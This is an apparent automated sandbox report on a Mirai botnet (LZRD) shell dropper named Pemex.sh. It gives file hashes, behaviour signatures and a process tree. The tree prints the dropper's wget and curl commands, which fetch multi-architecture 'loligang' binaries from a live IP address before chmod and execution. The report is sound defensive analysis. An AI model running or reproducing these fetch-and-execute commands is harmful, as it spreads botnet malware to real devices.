Analysis

  • max time kernel
    114s
  • max time network
    160s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    23-12-2024 06:19

General

  • Target

    Pemex.sh

  • Size

    1KB

  • MD5

    e18ba04d72384ac85e6117c774f6d4f9

  • SHA1

    6cb8e9a2da2db042da0875a08f43cc867b8a2c5b

  • SHA256

    289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e

  • SHA512

    3e69c0fdb07347f2dcd8d3b3d9514d392a572173afec60fd702180cf3f7d5d21bca67dff2cb022641c7f0a2df4b817f1589a6a1599726ddeea67ba5c768e954d

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (63573) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 8 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 4 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 10 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads system network configuration 1 TTPs 4 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Pemex.sh
    /tmp/Pemex.sh
    1⤵
    • Writes file to tmp directory
    PID:660
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.x86
      2⤵
      • Writes file to tmp directory
      PID:662
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.x86
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:697
    • /bin/cat
      cat loligang.x86
      2⤵
        PID:713
      • /bin/chmod
        chmod +x awoo loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL
        2⤵
        • File and Directory Permissions Modification
        PID:715
      • /tmp/awoo
        ./awoo
        2⤵
        • Executes dropped EXE
        PID:716
      • /usr/bin/wget
        wget http://185.255.120.43/lmaoWTF/loligang.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:718
      • /usr/bin/curl
        curl -O http://185.255.120.43/lmaoWTF/loligang.mips
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:735
      • /bin/cat
        cat loligang.mips
        2⤵
        • System Network Configuration Discovery
        PID:754
      • /bin/chmod
        chmod +x awoo loligang.mips loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL
        2⤵
        • File and Directory Permissions Modification
        PID:755
      • /tmp/awoo
        ./awoo
        2⤵
        • Executes dropped EXE
        PID:757
      • /usr/bin/wget
        wget http://185.255.120.43/lmaoWTF/loligang.mpsl
        2⤵
        • Writes file to tmp directory
        PID:759
      • /usr/bin/curl
        curl -O http://185.255.120.43/lmaoWTF/loligang.mpsl
        2⤵
        • Checks CPU configuration
        • Writes file to tmp directory
        PID:778
      • /bin/cat
        cat loligang.mpsl
        2⤵
          PID:779
        • /bin/chmod
          chmod +x awoo loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL
          2⤵
          • File and Directory Permissions Modification
          PID:780
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          PID:781
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.arm4
          2⤵
            PID:783
          • /usr/bin/curl
            curl -O http://185.255.120.43/lmaoWTF/loligang.arm4
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:784
          • /bin/cat
            cat loligang.arm4
            2⤵
              PID:785
            • /bin/chmod
              chmod +x awoo loligang.arm4 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL
              2⤵
              • File and Directory Permissions Modification
              PID:786
            • /tmp/awoo
              ./awoo
              2⤵
              • Executes dropped EXE
              PID:787
            • /usr/bin/wget
              wget http://185.255.120.43/lmaoWTF/loligang.arm5
              2⤵
              • Writes file to tmp directory
              PID:788
            • /usr/bin/curl
              curl -O http://185.255.120.43/lmaoWTF/loligang.arm5
              2⤵
              • Checks CPU configuration
              • Reads runtime system information
              • Writes file to tmp directory
              PID:789
            • /bin/cat
              cat loligang.arm5
              2⤵
                PID:792
              • /bin/chmod
                chmod +x awoo loligang.arm4 loligang.arm5 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL
                2⤵
                • File and Directory Permissions Modification
                PID:793
              • /tmp/awoo
                ./awoo
                2⤵
                • Executes dropped EXE
                PID:794
              • /usr/bin/wget
                wget http://185.255.120.43/lmaoWTF/loligang.arm6
                2⤵
                • Writes file to tmp directory
                PID:795
              • /usr/bin/curl
                curl -O http://185.255.120.43/lmaoWTF/loligang.arm6
                2⤵
                • Checks CPU configuration
                • Reads runtime system information
                • Writes file to tmp directory
                PID:797
              • /bin/cat
                cat loligang.arm6
                2⤵
                  PID:798
                • /bin/chmod
                  chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL
                  2⤵
                  • File and Directory Permissions Modification
                  PID:799
                • /tmp/awoo
                  ./awoo
                  2⤵
                  • Executes dropped EXE
                  PID:800
                • /usr/bin/wget
                  wget http://185.255.120.43/lmaoWTF/loligang.arm7
                  2⤵
                  • Writes file to tmp directory
                  PID:801
                • /usr/bin/curl
                  curl -O http://185.255.120.43/lmaoWTF/loligang.arm7
                  2⤵
                  • Checks CPU configuration
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:802
                • /bin/cat
                  cat loligang.arm7
                  2⤵
                    PID:803
                  • /bin/chmod
                    chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL
                    2⤵
                    • File and Directory Permissions Modification
                    PID:804
                  • /tmp/awoo
                    ./awoo
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Reads system network configuration
                    • Reads runtime system information
                    PID:805
                  • /usr/bin/wget
                    wget http://185.255.120.43/lmaoWTF/loligang.ppc
                    2⤵
                    • Writes file to tmp directory
                    PID:809
                  • /usr/bin/curl
                    curl -O http://185.255.120.43/lmaoWTF/loligang.ppc
                    2⤵
                    • Checks CPU configuration
                    • Writes file to tmp directory
                    PID:821
                  • /bin/chmod
                    chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.ppc loligang.x86 Pemex.sh
                    2⤵
                    • File and Directory Permissions Modification
                    PID:823
                  • /tmp/awoo
                    ./awoo
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Reads system network configuration
                    • Reads runtime system information
                    PID:824
                  • /usr/bin/wget
                    wget http://185.255.120.43/lmaoWTF/loligang.m68k
                    2⤵
                    • Writes file to tmp directory
                    PID:828
                  • /usr/bin/curl
                    curl -O http://185.255.120.43/lmaoWTF/loligang.m68k
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:832
                  • /bin/chmod
                    chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.x86 Pemex.sh
                    2⤵
                    • File and Directory Permissions Modification
                    PID:836
                  • /tmp/awoo
                    ./awoo
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Reads system network configuration
                    • Reads runtime system information
                    PID:837
                  • /usr/bin/wget
                    wget http://185.255.120.43/lmaoWTF/loligang.sh4
                    2⤵
                    • Writes file to tmp directory
                    PID:841
                  • /usr/bin/curl
                    curl -O http://185.255.120.43/lmaoWTF/loligang.sh4
                    2⤵
                    • Checks CPU configuration
                    • Writes file to tmp directory
                    PID:848
                  • /bin/chmod
                    chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.sh4 loligang.x86 Pemex.sh
                    2⤵
                    • File and Directory Permissions Modification
                    PID:852
                  • /tmp/awoo
                    ./awoo
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Reads system network configuration
                    • Reads runtime system information
                    PID:853

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/awoo

                  Filesize

                  87KB

                  MD5

                  5f6d2539a443501c888fc90986479ee6

                  SHA1

                  1f1ce02f9cafc0e684559cd7e36170d6cba370dc

                  SHA256

                  5775d9b48bb5c73f8e4625ee86f07e33967aecca610947654e8eea692e200137

                  SHA512

                  3bd781322c46687a8d750c1129b843a2a2312b186094d5918d5d8eac8c0b04ef8ee14a6a14fb74eb557bdb6558f78301a597ee651c4ace2aa23ebe02554a7198

                • /tmp/awoo

                  Filesize

                  89KB

                  MD5

                  9a397c973a66d7380ca64d61070b88d3

                  SHA1

                  f6828d001883357d22adf948b087ca400c5498dc

                  SHA256

                  67b7d4c356522d870024d4f04289dc6bcc53537209478fe43347511abb7e63fc

                  SHA512

                  18c4d902787043acdc63b3640f6e405dc8f96be38fbd40664595b1c6224adddcfc7895a20417a0de140c8280dc117f3dc7e9bcbb9336b8f0eabfb9f44d7adb77

                • /tmp/awoo

                  Filesize

                  219B

                  MD5

                  77a1be2e52dbcd8c91339552d24d4307

                  SHA1

                  3022d244329aed127e19ee0d417fda68f2dd3e67

                  SHA256

                  4ccd015d16ad27e624cd00f668f50f22cc0657a51a32cbb852bc9b0f0d09c583

                  SHA512

                  a697f281321f8fdbaee9a2e41867a233bad3c36c9fd16d7bf026736bd97c5139f19bc44283780b957985045a2aeeaca177c5cd2d8e534466eec80c255d31d9b8

                • /tmp/awoo

                  Filesize

                  61KB

                  MD5

                  9ead78d6b3492afbfd8e8336b18046d7

                  SHA1

                  0b53894dd4eaed898736ab347b64f0de63b47f9d

                  SHA256

                  5b8818d5ed45664d91b526b1b6ad29b24f3f9af48d9c8e4c49f44fcc12daa6ea

                  SHA512

                  48ba085c4920ed0d4b2512e1f6d6b5faaf6bce09f67da8db89bbb112fb6f7e94908ea5ca91e61237e546ac0864a26a65d3b302cd3894538c2be0f4af5ecae83a

                • /tmp/awoo

                  Filesize

                  141KB

                  MD5

                  abde533a1866fb17c76ff1edcf5facd1

                  SHA1

                  21bd062bb8d518f384ed18ca0f2cef91cffbb5f8

                  SHA256

                  ce83c30530762a5dc8832ea605a05d7c411c33d63465ce96cc37b7ef02d4223b

                  SHA512

                  d55f6adfa3dd8b543ed972d6562c8f20cbcb0772f3b7dbc125f2dab9183c92f00feee991f75d85d33add31429f077c64e0d87bda4ab4ef18f159e7e6b116dfec

                • /tmp/loligang.x86

                  Filesize

                  64KB

                  MD5

                  2354f2531c0bf296738fa7733c42785f

                  SHA1

                  86508e4ee74c70bf226f6666bf227a12be69dcad

                  SHA256

                  3d0b5252c0f8736759af8b122612395ea484794afbdeb5435769f3c164d04c93

                  SHA512

                  eda30463d2e8355af4d6626815aedb78b1b5d43c4df53e4a9a72405074a22e9fd09f54e882b0c5ad5136202907a7e6e599d29d325d6e0b3188e6f8ff77abe679